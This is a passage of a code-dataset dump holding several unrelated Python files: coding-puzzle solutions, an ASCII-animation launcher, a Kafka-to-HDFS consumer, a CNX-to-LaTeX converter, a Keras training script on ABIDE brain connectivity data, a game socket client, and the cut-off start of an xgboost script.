squared_number.append(neg_ptr_sq)\n neg_ptr -= 1\n\n return squared_number\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.sortedSquares([-4, -1, 0, 3, 10]))\n","repo_name":"karthikpalavalli/Puzzles","sub_path":"leetcode/squares_of_sorted_array.py","file_name":"squares_of_sorted_array.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74209671471","text":"#!/usr/bin/env python\n\"\"\"\nsimple ASCII-mation launcher\n\nA launcher for simple animations made using either\n or .\n\nusage: anim_launcher.py [-h] [--nox] [-t DELTAT] [-d DELTAD] [-z SIZE]\n [-f FILE] [-q]\n\"\"\"\nimport argparse\nimport subprocess\n\ntry:\n import Tkinter as tk\n import tkFileDialog\nexcept ImportError:\n try:\n import tkinter as tk\n from tkinter import filedialog as tkFileDialog\n except ImportError:\n pass\ntry:\n import wx\nexcept ImportError:\n pass\n\nfrom cjh.cli import Cli\nfrom cjh.config import Config\n\n__author__ = 'Chris Horn '\n__license__ = 'GPL'\n\n\n################\n# PROCEDURES #\n################\ndef _parse_args():\n \"\"\"\n Parse arguments\n (see above)\n \"\"\"\n parser = argparse.ArgumentParser(description='Simple ASCIImation Launcher')\n parser.add_argument(\n '--nox', action='store_true', help='text-based interface')\n parser.add_argument('-t', '--deltat', type=float, help='time interval')\n parser.add_argument(\n '-d', '--deltad', type=float, help='displacement interval')\n parser.add_argument('-z', '--size', type=int, help='board size')\n parser.add_argument(\n '-f', '--file', type=str,\n help='goban animation file (a python program)')\n parser.add_argument(\n '-q', action='count',\n help='-q,-qq suppress welcome message/splash screen')\n if __name__ == '__main__':\n return parser.parse_args()\n else:\n return None\n\n\ndef _set_parameters():\n \"\"\"\n Set minimum time and distance intervals.\n \"\"\"\n if ARGS is not None and ARGS.deltat is not None:\n t_interval = ARGS.deltat\n else:\n t_interval = .1\n\n if ARGS is not None and ARGS.deltad is not None:\n d_interval = ARGS.deltad\n else:\n d_interval = 2\n\n if ARGS is not None and ARGS.size is not None:\n size = ARGS.size\n elif SHELL.platform in ['android']:\n size = 7\n else:\n size = 19\n\n if ARGS is not None and ARGS.file is not None:\n cmd_list = [ARGS.file]\n\n# else: cmd_list = [SHELL.arg({'EN':'module to launch', 'EO':'modulo por kom\n#encigi'}[LANG])]\n# else: cmd_list = [SHELL.arg({'EN':'module to launch', 'EO':'modulo por kom\n#encigi'}[LANG])]\n\n elif SHELL.interface == 'Tk':\n cmd_list = [tkFileDialog.askopenfile(\n parent=SHELL.main_window, mode='r', filetypes=[(\n 'Python files', '*.py')], title={\n 'EN': 'Choose a file', 'EO': 'Elektu dosieron'}[LANG]).name]\n else:\n cmd_list = []\n return (t_interval, d_interval, size, cmd_list)\n\n\ndef launch_module(cmd_list):\n \"\"\"\n Play the animation.\n \"\"\"\n if SHELL.interface == 'Tk':\n cmd = [word.encode(\n 'utf-8') for word in CONFIG.config_dict['terminal'].split()] +\\\n cmd_list\n else:\n cmd = cmd_list\n\n# cmd[-1] = './%s' % cmd[-1]\n #print('Command is \"{}\"'.format(cmd))\n #Cli().wait()\n\n proc = subprocess.Popen(cmd)\n proc.wait()\n\n## Add a time counter? ##\n\n##########\n# DATA #\n##########\n\n## Prepare environment ##\n\n\n#if __name__ == '__main__':\n# if len(sys.argv[1:]) == 0:\n# sys.argv.append('-h')\n\nARGS = _parse_args()\nCONFIG = Config()\nLANG = CONFIG.get_lang_key()\n\nif ARGS is not None and ARGS.nox is True:\n SHELL = Cli()\nelse:\n SHELL = CONFIG.start_user_profile()\n if SHELL.interface in ['Tk']:\n SHELL.main_window.title(\n {'EN': 'asciimation player',\n 'EO': 'ASCII bildfilm-komencigilo'}[LANG])\n\nif SHELL.interface in ['wx', 'Tk']:\n SHELL.center_window(height_=50, width_=180)\n\nif SHELL.interface is 'Tk':\n SHELL.msg.destroy()\n PLAY = tk.Button(\n SHELL.main_window, text={'EN': 'Play', 'EO': 'Ek'}[LANG],\n command=lambda: launch_module(CMD_LIST))\n PLAY.pack(fill=tk.BOTH, expand=1)\nelif SHELL.interface is 'wx':\n PANEL = wx.Panel(SHELL.main_window, -1)\n PLAY = wx.Button(PANEL, -1, 'Play', pos=(50, 20))\n PLAY.SetDefault()\n\n## Set animation parameters ##\n\n##########\n# MAIN #\n##########\nif __name__ == '__main__':\n if ARGS is not None and ARGS.q is None:\n SHELL.welcome('Simple ASCIImation Launcher',\n \"\"\"\n A launcher for simple animations made using either cjh.Graph or\n cjh.Goban.\n \"\"\")\n\n T_INTERVAL, D_INTERVAL, SIZE_, CMD_LIST = _set_parameters()\n\n\ndef main():\n \"\"\"\n Print a welcome message on first run. If shell is Tk or wx, create a\n PLAY button.\n \"\"\"\n\n if SHELL.interface is 'Tk':\n PLAY.focus_set()\n SHELL.main_window.mainloop()\n\n elif SHELL.interface is 'wx':\n SHELL.start_app()\n\n else:\n launch_module(CMD_LIST)\n\nif __name__ == '__main__':\n main()\n","repo_name":"hammerhorn/hammerhorn-jive","sub_path":"anim_launcher/anim_launcher.py","file_name":"anim_launcher.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72441890992","text":"\"\"\"\n소용돌이를 예쁘게 출력하라\n\nhttps://kswims.tistory.com/138\n\n구현 문제로 문제의 조건에 맞게 코드로 구현하면 된다...\n\n우선 r2 - r1은 40보다 작거나 같고 c2-c1은 4보다 작거나 같기에 해당 크기 만큼만 배열을 만들어\n공간을 낭비하지 않도록 한다. \n\n소용돌이치는 규칙을 살펴보면 동서남북 총 4방향으로 돌고 있는데 방향이 두번 바뀔 때마다 한 방향에서\n전진해야하는 카운트가 증가한다. 이 규칙을 통해서 방향을 바꿔주며 좌표를 갱신해주면 된다.\n그리고 해당 문제는 (0,0)에서 소용돌이를 시작해야하므로 x,y 값은 실제 소용돌이가 치는(음수를 포함하는)\n좌표를 뜻하게 구현헀다. 그런데 출력을 위해 할당한 graph에 그리기 위해서는\n음수를 포함하는 좌표를 사용할 수 없으므로 (x-r1, y-c1) 로 값을 계산해주어서 기록을 하는 범위인\n(r1, c1) ~ (r2, c2)로 매칭한다.\n\"\"\"\n \ndef solution2():\n import sys\n\n # (r1, c1) 가장 왼쪽 위, (r2, c2)는 가장 오른쪽 아래 = (행, 열)\n r1, c1, r2, c2 = map(int, sys.stdin.readline().split(\" \"))\n # 0 <= r2 - r1 <= 49, 0 <= c2 - c1 <= 4\n graph = [[0] * 5 for _ in range(50)]\n # graph 원소의 개수\n number_of_graph = (c2 - c1 + 1) * (r2 - r1 + 1)\n # 동서남북 방향을 나타냄\n dx = [-1, 0, 1, 0]\n dy = [0, -1, 0, 1]\n \n x = y = 0\n dir = 3\n dcnt = num = 1\n cnt = 0\n \n # 가장 왼쪽 위, 아래와 가장 오른쪽 위, 아래의 좌표가 채워지지 않았다면\n # while not(graph[0][0] != 0 and graph[0][c2-c1] != 0 and graph[r2-r1][0] != 0 and graph[r2-r1][c2-c1] !=0):\n # 아직 graph의 원소의 개수만큼 채우지 않았다면\n while number_of_graph != 0:\n # 범위 안에 graph가 포함될경우\n if r1 <= x <= r2 and c1 <= y <= c2:\n graph[x - r1][y - c1] = num\n number_of_graph -= 1\n \n # 현재 숫자 및 전진 count 증가\n num += 1\n cnt += 1\n \n # 방향에 따라서 x, y 좌표 이동\n x = x + dx[dir]\n y = y + dy[dir]\n \n # 전진해야하는 카운트와 같다면\n if cnt == dcnt:\n cnt = 0\n # 방향 계산\n dir = (dir + 1) % 4\n # 동쪽 또는 서쪽으로 간다면 전진해야하는 카운트 증가\n if dir == 3 or dir == 1:\n dcnt += 1\n \n cnt = 0\n \n # num은 현재 최댓값 -> 자릿수 계산\n while num > 0:\n num //= 10\n cnt += 1 # 출력폭을 찾기 위해서\n \n for i in range(r2 - r1 + 1):\n for j in range(c2 - c1 + 1):\n print(str(graph[i][j]).rjust(cnt), end=\" \")\n print()\n \nsolution2()","repo_name":"dhtmaks2540/LeetCode-Algorithm","sub_path":"baekjoon_problems/implementation/1022.py","file_name":"1022.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1290135747","text":"from kafka import KafkaConsumer\nfrom datetime import datetime, timedelta\nimport time\nfrom hdfs import InsecureClient\nimport pandas as pd\nimport json\n\nhost = 'hdfs://vm-dlake2-m-1.test.local'\n\npath = '/user/grushevskiy/fb_data/'\n\nconsumer = KafkaConsumer('fb_grushevskiy', bootstrap_servers='vm-strmng-s-1.test.local:9092',\n group_id='group_src_1', value_deserializer=lambda m: json.loads(m.decode('utf-8')))\n\nclient = InsecureClient(host, user='grushevskiy')\n\ni = 0\nfor message in consumer:\n val = []\n dict = json.loads(message.value)\n for key in dict:\n val.append(dict[key])\n i = +1\n if i == 480000:\n i = 0\n df = pd.DataFrame(val)\n with client.write(path + str(datetime.now())+'.csv') as writer:\n df.to_csv(writer, index=False, sep=';')\n\nconsumer.close()\n","repo_name":"IlyaGrushevsky/Final_battle","sub_path":"csv_to_hdfs.py","file_name":"csv_to_hdfs.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31260929459","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nParse each index.cnxml.html found in each module to latex format\n\n.. $Id$\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n__docformat__ = \"restructuredtext en\"\n\nlogger = __import__('logging').getLogger(__name__)\n\nimport os\nimport codecs\nimport simplejson as json\n\nfrom lxml import html\n\nfrom ..util import rename_filename\n\nfrom ..renders.LaTeX.base import base_renderer\n\nfrom .. import scoped_registry\n\nfrom .xml_reader import CNX_XML\n\nfrom .adapters.run_adapter import adapt\n\nfrom . import cnx_glossary\n\n\nclass CNXParser(object):\n\n def __init__(self, input_file, output_directory):\n cnx_xml = CNX_XML()\n self.collection = cnx_xml.read_xml(input_file)\n self.image_list = []\n self.latex_filenames = []\n self.content_folder = [] # will be use to retrieve images or pdf\n self.latex_main_files = u''\n\n head, _ = os.path.split(input_file)\n self.cnx_directory = head\n self.output_directory = output_directory\n scoped_registry.output_directory = output_directory\n self.tex_filepath = []\n\n def process_collection(self):\n collection = self.collection\n self.metadata = collection.metadata\n\n if u'title' in self.metadata:\n title = rename_filename(self.metadata[u'title'])\n self.latex_main_files = u'MAIN_%s.tex' % title\n scoped_registry.book_title = title\n\n content = collection.content\n if content.modules:\n self.process_modules(content.modules,\n type_=u'collection')\n\n subcollections = content.subcollections\n if subcollections:\n for subcollection in subcollections:\n self.process_subcollection(subcollection)\n\n self.create_main_latex()\n\n def process_modules(self, modules, type_=None, latex_filename=None):\n result = []\n result_append = result.append\n for module in modules:\n if type_ == u'collection':\n scoped_registry.cnx_glossary = []\n doc_content = self.process_document(module.document)\n tex_filename = u'%s.tex' % rename_filename(module.title)\n self.latex_filenames.append(tex_filename)\n doc_content = self.process_glossary(doc_content)\n attribution = self.get_attribution()\n if attribution is not None:\n doc_content = u'%s\\n\\n%s' % (doc_content, attribution)\n self.write_to_file(doc_content, tex_filename)\n elif type_ == u'subcollection':\n doc_content = self.process_document(module.document)\n result_append(doc_content)\n if type_ == u'subcollection':\n return u''.join(result)\n\n def process_document(self, document_folder):\n logger.info(u'________________________________________')\n logger.info(u'Process document %s', document_folder)\n tex_content = u''\n if len(self.cnx_directory) == 0:\n folder = u'%s' % (document_folder)\n else:\n folder = u'%s/%s' % (self.cnx_directory, document_folder)\n scoped_registry.current_dir = folder\n self.content_folder.append(folder)\n cnxml_html_file = u'%s/index.cnxml.html' % (folder)\n logger.info(cnxml_html_file)\n if os.path.exists(cnxml_html_file):\n with codecs.open(cnxml_html_file, 'r', 'utf-8') as file_:\n doc_fragment = html.fromstring(file_.read())\n cnx_html_body = adapt(doc_fragment, self)\n tex_content = base_renderer(cnx_html_body)\n attribution = self.get_attribution()\n if attribution is not None:\n tex_content = u'%s\\n\\n%s' % (tex_content, attribution)\n logger.info(u'________________________________________')\n return u'%s\\n\\n' % tex_content\n\n def process_subcollection(self, subcollection):\n scoped_registry.cnx_glossary = []\n tex_filename = u'%s.tex' % rename_filename(subcollection.title)\n self.latex_filenames.append(tex_filename)\n\n content = subcollection.content\n if content.modules:\n subcollection_content = self.process_modules(content.modules,\n type_=u'subcollection',\n latex_filename=tex_filename)\n subcollection_content = self.process_glossary(subcollection_content)\n chapter = u'\\\\chaptertitlesuppressed{%s}\\n' % (subcollection.title)\n subcollection_content = u'%s\\n%s' % (chapter, subcollection_content)\n self.write_to_file(subcollection_content, tex_filename)\n\n def write_to_file(self, content, filename, type_=None):\n if type_ is None:\n filepath = u'%s/%s' % (self.output_directory, filename)\n self.tex_filepath.append(filepath)\n with codecs.open(filepath, 'w', 'utf-8') as file_:\n file_.write(content)\n\n def create_main_latex(self):\n main_tex_content = generate_main_tex_content(self.metadata, self.latex_filenames)\n self.write_to_file(main_tex_content, self.latex_main_files)\n\n def process_glossary_(self):\n latex_files = self.tex_filepath\n glossary_dict = cnx_glossary.create_glossary_dictionary(\n scoped_registry.cnx_glossary)\n json_file = u'%s/glossary.json' % (self.output_directory)\n self.dictionary_to_json(glossary_dict, json_file)\n for file_ in latex_files:\n cnx_glossary.lookup_glossary_term_in_tex_file(file_,\n glossary_dict,\n search_text=None)\n\n def process_glossary(self, content):\n glossary_dict = cnx_glossary.create_glossary_dictionary(\n scoped_registry.cnx_glossary)\n return cnx_glossary.lookup_glossary_term_in_content(content,\n glossary_dict,\n search_text=None)\n\n def dictionary_to_json(self, dictionary, json_file):\n \"\"\"\n save dictionary to json file\n \"\"\"\n dict_json = json.dumps(dictionary, sort_keys=True, indent=4 * ' ')\n with codecs.open(json_file, 'w', 'utf-8') as fp:\n fp.write(dict_json)\n\n def get_attribution(self):\n if u'content-url' in self.metadata:\n atthref = self.metadata[u'content-url']\n attribution = u'\\\\subsection{Attribution}\\n\\\\textbf{Original book can be downloaded at \\\\href{%s}{%s}}' % (\n atthref, atthref)\n return attribution\n\n\ndef get_packages():\n LATEX_PACKAGES = [\n u'graphix',\n u'hyperref',\n u'ulem',\n u'Tabbing',\n u'textgreek',\n u'amsmath',\n u'nticourse',\n u'ntilatexmacros',\n u'ntiassessment',\n u'ntislidedeck',\n u'ntiglossary',\n ]\n package_list = []\n package_list_append = package_list.append\n for package in LATEX_PACKAGES:\n string = u'\\\\usepackage{%s}\\n' % (package)\n package_list_append(string)\n return u''.join(package_list)\n\n\ndef get_included_tex(included_tex_list):\n result = []\n result_append = result.append\n for tex in included_tex_list:\n inc = u'\\\\include{%s}\\n' % (tex)\n result_append(inc)\n return u''.join(result)\n\n\ndef generate_main_tex_content(metadata, included_tex_list):\n title = u'\\\\title{%s}\\n' % metadata[u'title'] if 'title' in metadata else u''\n author = get_book_authors(metadata)\n author = u'\\\\author{%s}\\n' % author if author is not None else u''\n package = get_packages()\n latex = get_included_tex(included_tex_list)\n return u'\\\\documentclass{book}\\n%s%s%s\\\\begin{document}\\n%s\\\\end{document}' % (\n package, title, author, latex)\n\n\ndef get_book_authors(metadata):\n if u'actors' in metadata:\n actors = metadata[u'actors']\n if u'person' in actors:\n person = actors[u'person']\n if u'fullname' in person:\n return person[u'fullname']\n\n\ndef main():\n cnx_parser = CNXParser(u'collection.xml')\n cnx_parser.process_collection()\n logger.info(cnx_parser.latex_main_files)\n logger.info(cnx_parser.latex_filenames)\n logger.info(cnx_parser.content_folder)\n\nif __name__ == '__main__':\n main()\n","repo_name":"OpenNTI/nti.contenttools","sub_path":"src/nti/contenttools/cnx/cnx_parser.py","file_name":"cnx_parser.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25091416989","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Flatten, Conv2D, MaxPooling2D, LocallyConnected2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras import optimizers\nfrom keras.engine.topology import Layer\nfrom sklearn.model_selection import StratifiedKFold\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras import backend as K\nimport numpy as np\nimport os\nfrom rfe_sensitivity_flat_ABIDE import compute_deeplift_scores\nfrom sklearn.model_selection import train_test_split\nfrom utils import prepare_dataset_abide_matrices_masked \nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\nfrom pylab import savefig\nfrom sklearn import metrics\nimport sys\n\nclass Hadamard(Layer):\n\n def __init__(self, **kwargs):\n self.name = 'Hadamard'\n self.trainable = True\n super(Hadamard, self).__init__(**kwargs)\n\n def build(self, input_shape):\n # Create a trainable weight variable for this layer.\n self.kernel = self.add_weight(name='kernel', \n shape= input_shape[1:],\n initializer= keras.initializers.RandomUniform(minval=0.05, maxval=1, seed=None),\n trainable=True)\n super(Hadamard, self).build(input_shape)\n\n def call(self, x):\n print(x.shape, self.kernel.shape)\n print ('self.kernel: ', self.kernel)\n out = np.multiply(x,self.kernel)\n print ('x * self.kernel', out)\n print ('out.shape', out.shape)\n\n return out\n\n def compute_output_shape(self, input_shape):\n print(input_shape)\n return input_shape\n\ndef modular_rearrangement_Graclus(X, perm):\n X_new = []\n N = X[0].shape[0]\n\n for x in X:\n new_x = np.zeros((perm.shape[0], perm.shape[0]))\n\n for new_node_1, old_node_1 in enumerate(perm):\n for new_node_2, old_node_2 in enumerate(perm):\n if old_node_1 < N and old_node_2 < N :\n new_x[new_node_1, new_node_2] = x[old_node_1, old_node_2]\n else: \n new_x[new_node_1, new_node_2] = 0\n \n X_new.append(new_x) \n\n non_zero_rows = np.where(perm < N)[0]\n\n X_reduced = []\n\n for sample in X_new:\n reduced_matrix = sample[np.ix_(non_zero_rows, non_zero_rows)]\n X_reduced.append(reduced_matrix)\n\n return np.array(X_reduced)\n\ndef random_rearrangement(X, module_vector):\n num_nodes = X[0].shape[0]\n new_order = np.random.choice(num_nodes, size=num_nodes, replace=False)\n\n mapping = dict() # key is the row (represented by node index) in the original connectivity matrix and value is the corresponding row in connectivity rearranged matrix\n \n for node in range(num_nodes):\n mapping[node] = new_order[node]\n \n X_new = []\n\n for x in X:\n new_x = np.zeros(x.shape)\n for old_node_1 in mapping.keys():\n new_node_1 = mapping[old_node_1]\n for old_node_2 in mapping.keys():\n new_node_2 = mapping[old_node_2]\n new_x[new_node_1, new_node_2] = x[old_node_1, old_node_2]\n \n X_new.append(new_x)\n\n return np.array(X_new), new_order\n \ndef normalize_data(X, max_, min_):\n for i in range(X.shape[0]): \n X[i] = (X[i] - min_)/(max_ - min_)\n\n return X\n\ndef standardize_data(X, mean_, std_):\n for i in range(X.shape[0]):\n X[i] = (X[i] - mean_)\n return X\n\ndef flatten_data(X):\n num_features = int((X.shape[1]) * (X.shape[1] - 1) * 0.5)\n X_flattened = np.empty((X.shape[0], num_features))\n\n for i, matrix in enumerate(X):\n matrix_lower_triangular = matrix[np.triu_indices(np.shape(matrix)[0],1)]\n X_flattened[i] = np.ravel(matrix_lower_triangular, order=\"C\")\n\n return X_flattened\n\ndef funcNetFFN_1L(input_shape, dropout, batch_size):\n model = keras.models.Sequential()\n model.add(Dense(5, activation='relu', input_dim=input_shape))\n model.add(Dropout(rate=dropout))\n model.add(Dense(2))\n model.add(Activation('softmax'))\n return model\n\n\ndef funcNetFFN_2L(input_shape, dropout, batch_size):\n model = keras.models.Sequential()\n model.add(Dense(50, activation='relu', input_dim=input_shape))\n model.add(Dropout(rate=dropout))\n model.add(Dense(10, activation='relu'))\n model.add(Dropout(rate=dropout))\n model.add(Dense(2))\n model.add(Activation('softmax'))\n return model\n \ndef generate_compunded_neurons(multipler, number_of_values):\n neuron_list = []\n start = 1\n count = 0\n while(number_of_values):\n neuron_list.append(start * (multipler ** count))\n count += 1\n number_of_values -= 1\n\n return neuron_list\n\ndef custom_categorical_crossentropy(l1, layer_0_weights, from_logits=False):\n def orig_loss(y_true, y_pred):\n return K.categorical_crossentropy(y_true, y_pred) + l1 * K.sum(K.abs(layer_0_weights))\n return orig_loss\n\nclass_subset = 'ABIDE'\nmode = 'modular'\nmodel_type = sys.argv[1] # funcNetFFN_1L funcNetFFN_2L\nseeds = range(10, 20)\ngpu_id = '3'\n\nTARGET_DIRECTORY = './' + model_type + '/'\n\nif not os.path.isdir(TARGET_DIRECTORY):\n print(\"Folder that will store the results cannot be found.\")\n print(\"Creating the results folder in \" + TARGET_DIRECTORY)\n os.makedirs(TARGET_DIRECTORY)\n\nos.environ[\"CUDA_DEVICE_ORDER\"]= \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]= gpu_id\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nkeras.backend.set_session(sess)\n\nif not os.path.isdir(TARGET_DIRECTORY):\n print(\"Folder that will store the results cannot be found.\")\n print(\"Creating the results folder in \" + TARGET_DIRECTORY)\n os.makedirs(TARGET_DIRECTORY)\n\n\nfor SEED in seeds:\n mask = np.ones(34716)\n thresholds = np.array([1.0, 1.0]) # generate_compunded_neurons(0.9, 23) #np.linspace(1, 0.1, 10)\n X_prev, Y_prev = [], []\n for ix, i in enumerate(thresholds):\n ## Model parameters\n epochs = 100 # there's early stopping\n batch_size = 8\n learning_rate =0.0001\n decay = 0.001\n dropout = 0.1\n folds = 5\n np.random.seed(SEED)\n\n if ix == 0:\n (X,Y) = prepare_dataset_abide_matrices_masked(np.ones((264, 264)))\n if model_type == 'funcNetFFN_1L' or model_type == 'funcNetFFN_2L':\n X = flatten_data(X)\n\n else:\n threshold_1 = thresholds[ix-1]\n threshold_2 = thresholds[ix]\n prev_threshold = thresholds[ix-1]\n prev_best_model = TARGET_DIRECTORY + 'best_model_seed_' + str(SEED) + '_' + str(class_subset) + '_' + model_type + '_' + mode + '_' + str(prev_threshold) + '.h5'\n sensitivity_filename, mask = compute_deeplift_scores(class_subset + '_' + model_type + '_' + mode + '_SEED_' + str(SEED), X_prev, Y_prev, prev_best_model, 0, 1, 0, mask, gpu_id, threshold_1, threshold_2)\n (X,Y) = prepare_dataset_abide_matrices_masked(np.ones((264, 264)))\n X_flat = flatten_data(X)\n num_features = int(np.sum(mask))\n X = []\n for matrix in X_flat:\n masked_matrix = np.multiply(matrix, mask)\n X.append(masked_matrix[mask == 1])\n X = np.array(X)\n\n print ('Shape of input data', X.shape)\n print ('Number of features', num_features)\n\n idx = np.arange(len(X))\n np.random.shuffle(idx) # randomize index\n X, Y = X[idx], Y[idx] # randomize/shuffle dataset\n \n input_shape = X[0].shape\n all_fold_accuracies = []\n \n skf = StratifiedKFold(n_splits=folds, shuffle=True, random_state=SEED)\n fold_count = 0\n model_filename_list = []\n train_indices, val_indices = [], []\n for train_index, val_index in skf.split(X, Y.argmax(1)):\n train_indices.append(train_index)\n val_indices.append(val_index)\n X_train, Y_train = X[train_index], Y[train_index]\n X_val, Y_val = X[val_index], Y[val_index]\n\n if model_type != 'funcNetFFN_1L' and model_type != 'funcNetFFN_2L':\n print(\"Invalid model type\")\n exit()\n\n # Define model\n if model_type == 'funcNetFFN_1L':\n input_shape = X.shape[1]\n model = funcNetFFN_1L(input_shape, dropout, batch_size)\n loss_fn = \"categorical_crossentropy\"\n elif model_type == 'funcNetFFN_2L':\n input_shape = X.shape[1]\n model = funcNetFFN_2L(input_shape, dropout, batch_size)\n loss_fn = \"categorical_crossentropy\"\n\n Adam = optimizers.Adam(lr=learning_rate) #, decay=decay\n\n if loss_fn == 'custom':\n model.compile(loss= custom_categorical_crossentropy(0.001, model.layers[0].get_weights()[0]), optimizer=Adam, metrics=[\"accuracy\"])\n else:\n model.compile(loss= \"categorical_crossentropy\", optimizer=Adam, metrics=[\"accuracy\"])\n\n model_filename = TARGET_DIRECTORY + 'best_model_seed_' + str(SEED) + '_' + str(class_subset) + '_' + model_type + '_' + mode + '_' + str(i) + '_fold_' + str(fold_count) + '.h5'\n model_filename_list.append(model_filename)\n callbacks = [ModelCheckpoint(filepath=model_filename, monitor='val_acc', save_best_only=True)]\n\n # Train model\n history = model.fit(X_train, Y_train, batch_size=batch_size, callbacks=callbacks, epochs=epochs, validation_data=(X_val, Y_val), verbose=1)\n score = model.evaluate(X_val, Y_val, batch_size=batch_size)\n \n best_val_acc = max(history.history['val_acc'])\n best_epoch = history.history['val_acc'].index(max(history.history['val_acc']))\n model.load_weights(model_filename)\n\n best_prediction = model.predict(X_val, batch_size=batch_size, verbose=1)\n MAE = metrics.mean_absolute_error(Y_val, best_prediction, sample_weight=None, multioutput='uniform_average')\n AUC = metrics.roc_auc_score(Y_val, best_prediction, average='macro', sample_weight=None, max_fpr=None)\n\n print(SEED, 'best accuracy original: ', best_val_acc, 'loaded: ', model.evaluate(X_val, Y_val, batch_size=batch_size), 'at epoch ', best_epoch, 'MAE ', MAE, 'AUC ', AUC)\n\n all_fold_accuracies.append(best_val_acc)\n\n with open(TARGET_DIRECTORY + model_type + '_' + mode + '_kfold_training_logs_' + class_subset + '.csv', 'a') as out_stream:\n out_stream.write(str(SEED) + ', ' + str(i) + ', ' + str(fold_count) + ', ' + str(best_epoch) + ', ' + str(best_val_acc) + ', ' + str(MAE) + ', ' + str(AUC) + '\\n')\n\n keras.backend.clear_session()\n fold_count += 1\n\n best_fold = all_fold_accuracies.index(max(all_fold_accuracies))\n best_model_name = model_filename_list[best_fold]\n print('Fold number ' + str(best_fold) + ' has the highest accuracy score of ' + str(max(all_fold_accuracies)))\n\n val_index = val_indices[best_fold]\n X_, Y_ = prepare_dataset_abide_matrices_masked(np.ones((264, 264)))\n\n if model_type == 'funcNetFFN_1L' or model_type == 'funcNetFFN_2L':\n X_ = flatten_data(X_)\n\n X_prev, Y_prev = X_[val_index], Y_[val_index]\n\n for model_file_fold in model_filename_list:\n if model_file_fold != best_model_name:\n os.remove(model_file_fold)\n else:\n filename = TARGET_DIRECTORY + 'best_model_seed_' + str(SEED) + '_' + str(class_subset) + '_' + model_type + '_' + mode + '_' + str(i) + '.h5'\n os.rename(model_file_fold, filename)\n","repo_name":"nimiew/isbi2020","sub_path":"funcNetFFN_kfold_ABIDE.py","file_name":"funcNetFFN_kfold_ABIDE.py","file_ext":"py","file_size_in_byte":11803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6544779054","text":"#!/user/bin/python3\n# guest.py\n\nimport sys, socket, signal, select, termios, tty\n\nserverFile = open(\"serverinfo.txt\", \"r\")\nserver = serverFile.readline().strip()\nport = serverFile.readline().strip()\nport = int(port)\nserverFile.close()\n\nguestsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nguestsocket.connect((server, port))\n\n#send guest identifier\nguestIdentifier = \"guest\"\nguestsocket.send(guestIdentifier.encode(\"ascii\"))\n\n#get the list of host names from the server\nhostNames = guestsocket.recv(1024).decode(\"utf-8\").strip()\nprint(\"guest: list of hostnames: \" + hostNames)\n\nhostChoice = input(\"Enter host name to join: \")\n\nguestsocket.send(hostChoice.encode(\"ascii\"))\nrawHostAddress = guestsocket.recv(1024).decode(\"utf-8\").strip()\nprint(\"guest: received host address \" + rawHostAddress + \" from server.\")\n\nguestsocket.close()\nportFlag = True\nhostAddress = \"\"\nhostPort = \"\"\nfor x in rawHostAddress:\n\tif x in \"() '\\n\\t\":\n\t\tcontinue\n\telif x == ',':\n\t\tportFlag = False\n\telse:\n\t\tif portFlag:\n\t\t\thostAddress += x\n\t\telse:\n\t\t\thostPort += x\n\nguestsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nguestsocket.connect((hostAddress, int(hostPort)))\n\nguestsocket.setblocking(False)\n\noldSettings = termios.tcgetattr(sys.stdin)\ntry:\n\ttty.setcbreak(sys.stdin.fileno())\n\n# main host/guest communication loop\n\twhile True:\n\t\tif select.select([sys.stdin], [], [], 0) == ([sys.stdin],[],[]):\n\t\t\t#print(\"stuck 1\")\n\t\t\tuserCmd = sys.stdin.read(1)\n\t\t\t#print(\"stuck 2\")\n\t\t\tif userCmd:\n\t\t\t\t#print(\"stuck 3\")\n\t\t\t\tguestsocket.send(userCmd.encode(\"ascii\"))\n\t\n\t\t\t#print(\"stuck 4\")\n\t\ttry:\n\t\t\thostCmd = guestsocket.recv(4096).decode(\"utf-8\")\n\t\t\tprint(hostCmd)\n\t\texcept BlockingIOError:\n\t\t\tcontinue\n\t\n\t\t\t#print(\"stuck 5\")\nfinally:\n\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldSettings)\n","repo_name":"Insanebob169/CS419_endless_runner","sub_path":"guest_test.py","file_name":"guest_test.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22832645508","text":"#!/data1/anaconda3/bin/python\n#!encoding:utf-8\n\"\"\"\n遍历max_depth参数,方便调优\n\"\"\"\nimport time\nimport xgboost as xgb\nfrom Loger import Loger\nimport numpy as np\nimport sys\n\neta = 0.1\n\npath_data = \"./data/\"\nfile_col_names = \"./col_names.txt\"\nfile_train = path_data + \"train.csv\"\nfile_tests = path_data + \"test.csv\"\npath_model = '../data/model/'\nloger = Loger()\nlog = loger.log\n\ndef load_col_names():\n ret = []\n rf = open(file_col_names,'r')\n for line in rf.readlines():\n ret.append(line.strip().split()[1])\n log(\"#cols: %s\" % len(ret))\n rf.close()\n return ret\n \n# 正负样本准确率平均\ndef acc_avg(preds, dtrain):\n np_label = 